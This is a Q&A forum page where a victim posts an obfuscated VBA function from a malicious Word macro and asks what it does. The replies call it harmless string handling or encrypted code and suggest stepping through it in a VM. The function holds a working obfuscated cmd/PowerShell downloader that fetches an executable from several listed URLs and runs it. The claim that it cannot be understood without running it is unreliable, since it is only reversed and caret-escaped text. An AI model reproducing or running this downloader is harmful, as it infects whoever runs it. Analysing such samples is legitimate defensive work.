1

My other half was sent a piece of malware in MS word VBA. The document was opened, editing enabled and the Trojan was missed by the anti virus for some reason.

I'm 99% sure the system has been cleaned and the there are no lasting effects, however I'd like to understand what the code was trying to do so I can be 100% sure.

What I have managed to translate is beyond my skill.

This is the original function from the VBA:

Function BfXNd()
Dim nORTSq(3)
nORTSq(0) = Right(LCsbFFjF, 428)
nORTSq(1) = Left(JErht, 810)
nORTSq(2) = Mid(pjzflRs, 58, 796)
   Dim rnMCEl(3)
rnMCEl(0) = Left(JErht, 810)
rnMCEl(1) = Mid(pjzflRs, 58, 796)
rnMCEl(2) = MidB(iOGKfiB, 537, 348)
   Dim HXiIk(2)
HXiIk(0) = Left(JErht, 810)
HXiIk(1) = Mid(pjzflRs, 58, 796)
kRRCNwn = Chr(Format(7 + 7 + 1 + 16 + 68)) + "md /V:O/" + Chr(Format(4 + 4 + 1 + 11 + 47)) + Chr(Format(2 + 2 + 0 + 5 + 25)) + "s^e^t e^" + "4= ^ ^ ^   " + " ^ ^    ^ ^ ^   ^}^}^" + "{^h" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^t^a" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^};^ka^" + "er^b;Bv^M$ ^met^I^-^e^k^" + "ovn^I^;)BvM^$^ ,iE^S^$(^e^li" + "^Fd^a^oln^w^oD.^W^W^Y${^y" + "r^t^{)" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "R" + "^w$ ni^ i^ES$(h" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "aer^o^f" + "^;^'ex^e.'^+o^bV$+'^\'+" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^i" + "lbup:vne^$=^BvM^$;'68^9'^ =^ ^"
Dim WlsRmu(5)
WlsRmu(0) = MidB(iOGKfiB, 537, 348)
WlsRmu(1) = MidB(iOGKfiB, 537, 348)
WlsRmu(2) = Right(LCsbFFjF, 428)
WlsRmu(3) = Right(LCsbFFjF, 428)
WlsRmu(4) = Left(JErht, 810)
   Dim ojijX(2)
ojijX(0) = MidB(iOGKfiB, 537, 348)
ojijX(1) = MidB(iOGKfiB, 537, 348)
   Dim nHDNir(2)
nHDNir(0) = Mid(pjzflRs, 58, 796)
nHDNir(1) = Right(LCsbFFjF, 428)
jhcbfQ = "o^bV$;)'^@'(t^i^lpS.^'lk^U4^um" + "j4S/s^e^.ynnadrm//:" + "^p^tt^h^@JEVk5^m" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^W" + "/r^b.^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".no" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^e" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "i^pa//:^p^tt^h@^A^i1i^U" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^d^" + "I^Q/^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^.^sn" + "o^it^u^lo^s-ah" + "sna^d//:^ptt^h@bu^A"
Dim tmiOA(5)
tmiOA(0) = MidB(iOGKfiB, 537, 348)
tmiOA(1) = Left(JErht, 810)
tmiOA(2) = Left(JErht, 810)
tmiOA(3) = Mid(pjzflRs, 58, 796)
tmiOA(4) = Mid(pjzflRs, 58, 796)
pHiJQ = "^q^HHT^M/m" + "o" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".^i^lam^p^us^ten//:^p^tth@z^" + "O^SdrnmX/^mo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + ".no^is^sa^" + "pmo" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "ht" + "i^a^f//:^p^t^th'^=" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "Rw^$;t" + "n^ei^l" + Chr(Format(4 + 4 + 1 + 11 + 47)) + "^b^e^W^.teN" + " t" + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^e^jbo^-^wen=W^W" + "^Y$ lle^hsr^e^wo^p&&^f^or" + " /^L %^t ^in (^374;^-^1^;0)d^o" + " ^s^e^t ^qhL=!^qhL!!e^4:~%^t,"
Dim isfqZj(5)
isfqZj(0) = Left(JErht, 810)
isfqZj(1) = MidB(iOGKfiB, 537, 348)
isfqZj(2) = Mid(pjzflRs, 58, 796)
isfqZj(3) = MidB(iOGKfiB, 537, 348)
isfqZj(4) = Right(LCsbFFjF, 428)
   Dim HCOVDH(2)
HCOVDH(0) = MidB(iOGKfiB, 537, 348)
HCOVDH(1) = Left(JErht, 810)
   Dim YuAhz(5)
YuAhz(0) = Left(JErht, 810)
YuAhz(1) = Mid(pjzflRs, 58, 796)
YuAhz(2) = Right(LCsbFFjF, 428)
YuAhz(3) = Mid(pjzflRs, 58, 796)
YuAhz(4) = Mid(pjzflRs, 58, 796)
vflzlZjAjXX = "1!&&^i^f" + " %^t ^ls^s ^1 " + Chr(Format(7 + 7 + 1 + 16 + 68)) + "^al^l " + "%^qhL:^~^5%" + Chr(Format(2 + 2 + 0 + 5 + 25)) + ""
BfXNd = kRRCNwn + jhcbfQ + pHiJQ + vflzlZjAjXX
   Dim kmYzM(4)
kmYzM(0) = MidB(iOGKfiB, 537, 348)
kmYzM(1) = Mid(pjzflRs, 58, 796)
kmYzM(2) = Left(JErht, 810)
kmYzM(3) = Mid(pjzflRs, 58, 796)
   Dim hNkzi(5)
hNkzi(0) = Mid(pjzflRs, 58, 796)
hNkzi(1) = Left(JErht, 810)
hNkzi(2) = Left(JErht, 810)
hNkzi(3) = Mid(pjzflRs, 58, 796)
hNkzi(4) = MidB(iOGKfiB, 537, 348)
End Function
Improve this question
5
  • 1
    As far as I can tell, what you have there are just string operations, so this part is probably harmless. Try running it in a VM (that you can destroy or roll back afterwards). Was there an "eval" piece of code elsewhere to actually run something?
    – halfer
    Commented Sep 21, 2018 at 13:29
  • @halfer : Yeah, it's definitely missing an eval. Somewhere, something is calling BfXNd().
    – Terry Carmen
    Commented Sep 21, 2018 at 14:07
  • Sure, but once BfXNd() is running, I can't see it do anything other than create strings using string manipulation funcs. It'd need to do some eval in order to do something malicious. As Terry suggests, maybe you'd need to peek at one of the long values, such as kRRCNwn, in a safe environment.
    – halfer
    Commented Sep 21, 2018 at 14:16
  • It looks like it relies on global vars too - kRRCNwn is not defined inside the func, but it is used at the start.
    – halfer
    Commented Sep 21, 2018 at 14:18
  • The code is obfuscated and encrypted. you can run it inside an sandbox like Sandboxie or in VM or run it in online VBA interpreters like rextester.com/l/vb
    – Mojtaba Tajik
    Commented Sep 23, 2018 at 5:54

1 Answer 1

Reset to default
1

It's encrypted code.

There's no way to tell what it's doing without running it far enough to have it decrypt itself.

When run, the strings will be converted back into commands of some sort, at which point you can tell what it's going to do.

If you want to examine it, spin up a windows Virtual Machine (you can get them free from Microsoft), install Word and you can step through the code using the Debugger, which is in the "Macros" menu in Word.

Improve this answer
1
  • Many thanks. I could see the string was calling a cmd but the text didn't make any sense, I never thought about it being encrypted.
    – Steven Woods
    Commented Sep 21, 2018 at 14:49

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Not the answer you're looking for? Browse other questions tagged or ask your own question.